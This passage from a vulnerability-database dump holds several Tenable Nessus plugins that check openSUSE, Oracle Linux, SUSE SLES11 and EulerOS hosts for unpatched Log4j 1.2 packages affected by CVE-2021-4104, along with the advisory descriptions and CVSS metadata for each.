known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-javadoc-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-manual-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-mini-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual / log4j12-mini');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:46:22", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2021-5206 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-20T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : log4j (ELSA-2021-5206)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-07T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:log4j", "p-cpe:/a:oracle:linux:log4j-javadoc", "p-cpe:/a:oracle:linux:log4j-manual"], "id": "ORACLELINUX_ELSA-2021-5206.NASL", "href": "https://www.tenable.com/plugins/nessus/156206", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-5206.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156206);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/07\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"Oracle Linux 7 : log4j (ELSA-2021-5206)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-5206 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-5206.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-manual\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar pkgs = [\n {'reference':'log4j-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:22", "description": "The remote SUSE Linux SLES11 host has a package installed that is affected by a vulnerability as referenced in the SUSE- SU-2021:14866-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2021-14866-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156167", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:14866-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156167);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:14866-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES11 host has a package installed that is affected by a vulnerability as referenced in the SUSE-\nSU-2021:14866-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009915.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e463296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES11', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.15-26.32.17.1', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:57:39", "description": "According to the versions of the log4j package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : log4j (EulerOS-SA-2022-1276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-03-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:log4j", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1276.NASL", "href": "https://www.tenable.com/plugins/nessus/158462", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158462);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/01\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2022-A-0029\");\n\n script_name(english:\"EulerOS 2.0 SP5 : log4j (EulerOS-SA-2022-1276)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the log4j package installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d1353a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"log4j-1.2.17-16.h2.eulerosv2r7\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:06:27", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1631-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-29T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kafka-kit", "p-cpe:/a:novell:opensuse:kafka-source", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-1631.NASL", "href": "https://www.tenable.com/plugins/nessus/156340", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1631-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156340);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", 